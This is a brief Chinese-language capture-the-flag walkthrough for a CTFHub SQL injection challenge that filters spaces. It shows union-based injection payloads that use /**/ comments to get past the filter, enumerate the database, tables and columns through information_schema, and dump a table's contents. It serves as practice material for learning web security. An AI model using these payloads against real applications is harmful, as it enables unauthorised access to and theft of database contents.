CTFHUB-SQL注入-过滤空格

目录

查询数据库名

查询数据库中的表

查询表中字段

查询表中数据

---

空格被过滤，使用 /**/ 绕过

查询数据库名

-1/**/union/**/select/**/1,database()

查询数据库中的表

-1/**/union/**/select/**/1,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()

查询表中字段

-1/**/union/**/select/**/1,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema=database()/**/and/**/table_name='iweunwnolg'

查询表中数据

-1/**/union/**/select/**/1,group_concat(abhijtmzdc)/**/from/**/iweunwnolg